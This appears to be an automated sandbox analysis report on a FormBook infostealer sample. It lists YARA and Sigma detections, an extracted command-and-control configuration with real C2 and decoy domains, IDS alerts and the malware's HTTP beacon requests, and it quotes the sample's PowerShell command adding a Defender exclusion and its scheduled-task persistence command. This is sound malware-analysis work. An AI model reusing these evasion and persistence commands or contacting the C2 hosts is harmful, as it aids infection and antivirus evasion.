8.2.vbc.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
8.2.vbc.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
8.0.vbc.exe.400000.4.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
8.0.vbc.exe.400000.4.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
8.0.vbc.exe.400000.4.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
0.2.vbc.exe.3bfcd00.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.vbc.exe.3bfcd00.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xc8ab8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xc8e52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xf08d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xf0c72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xd4b65:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xfc985:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xd4651:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xfc471:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xd4c67:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xfca87:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xd4ddf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xfcbff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xc986a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xf168a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xd38cc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xfb6ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xca5e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xf2402:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xda057:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x101e77:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xdb10a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.vbc.exe.3bfcd00.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xd6f89:$sqlite3step: 68 34 1C 7B E1 0xd709c:$sqlite3step: 68 34 1C 7B E1 0xfeda9:$sqlite3step: 68 34 1C 7B E1 0xfeebc:$sqlite3step: 68 34 1C 7B E1 0xd6fb8:$sqlite3text: 68 38 2A 90 C5 0xd70dd:$sqlite3text: 68 38 2A 90 C5 0xfedd8:$sqlite3text: 68 38 2A 90 C5 0xfeefd:$sqlite3text: 68 38 2A 90 C5 0xd6fcb:$sqlite3blob: 68 53 D8 7F 8C 0xd70f3:$sqlite3blob: 68 53 D8 7F 8C 0xfedeb:$sqlite3blob: 68 53 D8 7F 8C 0xfef13:$sqlite3blob: 68 53 D8 7F 8C
8.0.vbc.exe.400000.8.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
8.0.vbc.exe.400000.8.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
8.0.vbc.exe.400000.8.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
0.2.vbc.exe.2aec108.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.vbc.exe.3bb72e0.3.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.vbc.exe.3bb72e0.3.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x10e4d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x10e872:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1362f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x136692:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x11a585:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1423a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x11a071:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x141e91:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x11a687:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1424a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x11a7ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x14261f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x10f28a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1370aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1192ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x14110c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x110002:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x137e22:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x11fa77:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x147897:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x120b2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.vbc.exe.3bb72e0.3.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x11c9a9:$sqlite3step: 68 34 1C 7B E1 0x11cabc:$sqlite3step: 68 34 1C 7B E1 0x1447c9:$sqlite3step: 68 34 1C 7B E1 0x1448dc:$sqlite3step: 68 34 1C 7B E1 0x11c9d8:$sqlite3text: 68 38 2A 90 C5 0x11cafd:$sqlite3text: 68 38 2A 90 C5 0x1447f8:$sqlite3text: 68 38 2A 90 C5 0x14491d:$sqlite3text: 68 38 2A 90 C5 0x11c9eb:$sqlite3blob: 68 53 D8 7F 8C 0x11cb13:$sqlite3blob: 68 53 D8 7F 8C 0x14480b:$sqlite3blob: 68 53 D8 7F 8C 0x144933:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 23 entries

Sigma Overview

System Summary:

Sigma detected: Suspicius Add Task From User AppData Temp

Show sources

Source: Process started

Author: frack113: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\vbc.exe" , ParentImage: C:\Users\user\Desktop\vbc.exe, ParentProcessId: 6420, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp, ProcessId: 6624

Sigma detected: Powershell Defender Exclusion

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\vbc.exe" , ParentImage: C:\Users\user\Desktop\vbc.exe, ParentProcessId: 6420, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe, ProcessId: 6604

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\vbc.exe" , ParentImage: C:\Users\user\Desktop\vbc.exe, ParentProcessId: 6420, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe, ProcessId: 6604

Sigma detected: T1086 PowerShell Execution

Show sources

Source: Pipe created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132809649656072936.6604.DefaultAppDomain.powershell

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.septemberstockevent200.com/ht08/"], "decoy": ["joye.club", "istanbulemlakgalerisi.online", "annikadaniel.love", "oooci.com", "curebase-test.com", "swisstradecenter.com", "hacticum.com", "centercodebase.com", "recbi56ni.com", "mmj0115.xyz", "sharpstead.com", "sprklbeauty.com", "progettogenesi.cloud", "dolinum.com", "amaroqadvisors.com", "traininig.com", "leewaysvcs.com", "nashhomesearch.com", "joy1263.com", "serkanyamac.com", "nursingprogramsforme.com", "huakf.com", "1w3.online", "watermountsteam.top", "tyralruutan.quest", "mattlambert.xyz", "xn--fiqs8sypgfujbl4a.xn--czru2d", "hfgoal.com", "587868.net", "noyoucantridemyonewheel.com", "riewesell.top", "expn.asia", "suplementarsas.com", "item154655544.com", "cdgdentists.com", "deboraverdian.com", "franquiciasexclusivas.tienda", "tminus-10.com", "psychoterapeuta-wroclaw.com", "coachingbywatson.com", "lknitti.net", "belenpison.agency", "facilitetec.com", "99077000.com", "thefitmog.com", "kinmanpowerwashing.com", "escueladelbuenamor.com", "getjoyce.net", "oilelm.com", "maikoufarm.com", "hespresso.net", "timothyschmallrealt.com", "knoxvilleraingutters.com", "roonkingagency.online", "trashwasher.com", "angyfoods.com", "yungbredda.com", "digipoint-entertainment.com", "shangduli.space", "kalaraskincare.com", "ktnsound.xyz", "miabellavita.com", "thenlpmentor.com", "marzhukov.com"]}

Yara detected FormBook

Show sources

Source: Yara match	File source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Antivirus detection for URL or domain

Show sources

Source: http://www.joye.club/ht08/?iJB=fVUe8feYpN4PFMr+KvtZZrG4xoghHK64bhP/N9fXdzCzpP/t7mUgEUqRnlKHZLETABk8BcDy+g==&IfNL=N8ph5BwH	Avira URL Cloud: Label: phishing
Source: http://www.mattlambert.xyz/ht08/?iJB=tWyE4dKPScuS56voJaD4LHzf4KVLRr2HjGj+V9mFA/0BkTQ5rlgiVQpU1IInoYX1Wdu+PEboiA==&IfNL=N8ph5BwH	Avira URL Cloud: Label: phishing

Source: 8.0.vbc.exe.400000.6.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.2.vbc.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.vbc.exe.400000.4.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.vbc.exe.400000.8.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: vbc.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: vbc.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: vbc.exe, 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe
Source:	Binary string: help.pdbGCTL source: vbc.exe, 00000008.00000002.344023750.000000000139A000.00000004.00000020.sdmp
Source:	Binary string: help.pdb source: vbc.exe, 00000008.00000002.344023750.000000000139A000.00000004.00000020.sdmp

Source: C:\Users\user\Desktop\vbc.exe	Code function: 4x nop then pop ebx		8_2_00406ABE
Source: C:\Windows\SysWOW64\help.exe	Code function: 4x nop then pop ebx		20_2_02B46ABE

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49794 -> 44.227.65.245:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49794 -> 44.227.65.245:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49794 -> 44.227.65.245:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49816 -> 172.67.188.247:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49816 -> 172.67.188.247:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49816 -> 172.67.188.247:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49821 -> 101.132.116.91:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49821 -> 101.132.116.91:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49821 -> 101.132.116.91:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.miabellavita.com
Source: C:\Windows\explorer.exe	Domain query: www.joye.club
Source: C:\Windows\explorer.exe	Domain query: www.maikoufarm.com
Source: C:\Windows\explorer.exe	Domain query: www.mmj0115.xyz
Source: C:\Windows\explorer.exe	Network Connect: 44.227.65.245 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.septemberstockevent200.com
Source: C:\Windows\explorer.exe	Domain query: www.watermountsteam.top
Source: C:\Windows\explorer.exe	Network Connect: 104.21.4.114 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.yungbredda.com
Source: C:\Windows\explorer.exe	Domain query: www.leewaysvcs.com
Source: C:\Windows\explorer.exe	Domain query: www.sharpstead.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 118.27.122.222 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.67.188.247 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 101.132.116.91 80	Jump to behavior

Performs DNS queries to domains with low reputation

Show sources

Source: C:\Windows\explorer.exe	DNS query: www.mmj0115.xyz
Source:	DNS query: www.mattlambert.xyz

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.septemberstockevent200.com/ht08/

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP

Source: global traffic	HTTP traffic detected: GET /ht08/?iJB=mF30mN7A1kBKKp3mrHfcBE8aj8d3j5TIPkteVwKSLkWL0x2hCorpOf84nkcbs5VIH8t4m4OlHQ==&IfNL=N8ph5BwH HTTP/1.1Host: www.sharpstead.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ht08/?iJB=Nn3GQotxroHeSkioJYlyOg7hZYbVcqG0YP1z9npFKY7KnSOBRhEQe9R9FJ0MVZ+9dT/G4+QqxQ==&IfNL=N8ph5BwH HTTP/1.1Host: www.maikoufarm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ht08/?iJB=YVcVQnADBOxtkizi8PwpXZC8MGRy3pUK9Tt3i8wwHZUtpCp/3ZP4J1retOso95pi3Qz1GtS4tg==&IfNL=N8ph5BwH HTTP/1.1Host: www.septemberstockevent200.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ht08/?iJB=fVUe8feYpN4PFMr+KvtZZrG4xoghHK64bhP/N9fXdzCzpP/t7mUgEUqRnlKHZLETABk8BcDy+g==&IfNL=N8ph5BwH HTTP/1.1Host: www.joye.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ht08/?iJB=wOE3x7GIWdnAHRhnI1Z2es1853h2m7xTnUUyaHf9EMpp2ij5NZFAPBiYMZ80Da0iVaPeuYXsZg==&IfNL=N8ph5BwH HTTP/1.1Host: www.mmj0115.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ht08/?iJB=wOE3x7GIWdnAHRhnI1Z2es1853h2m7xTnUUyaHf9EMpp2ij5NZFAPBiYMZ80Da0iVaPeuYXsZg==&IfNL=N8ph5BwH HTTP/1.1Host: www.mmj0115.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ht08/?iJB=7p5yDMcVtDK+2VMLZex1Kw5DaL8n+amtJoDm972Jkr9Bm6oPOM+PHzWXusl+HrepqAW+ZRiK3Q==&IfNL=N8ph5BwH HTTP/1.1Host: www.miabellavita.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ht08/?iJB=h33IU5xP+CsHIX0jyOd12cEn3mj+DYpLQqBt2JgN37c56kNOSv5/h9LYm8RBo0LsRlylinxRVA==&IfNL=N8ph5BwH HTTP/1.1Host: www.yungbredda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ht08/?iJB=tWyE4dKPScuS56voJaD4LHzf4KVLRr2HjGj+V9mFA/0BkTQ5rlgiVQpU1IInoYX1Wdu+PEboiA==&IfNL=N8ph5BwH HTTP/1.1Host: www.mattlambert.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 44.227.65.245 44.227.65.245

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Tue, 09 Nov 2021 11:57:34 GMTContent-Type: text/htmlContent-Length: 275ETag: "6182ae77-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 09 Nov 2021 11:57:40 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 74 30 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ht08/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Tue, 09 Nov 2021 11:58:02 GMTContent-Type: text/htmlContent-Length: 275ETag: "6182ac26-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
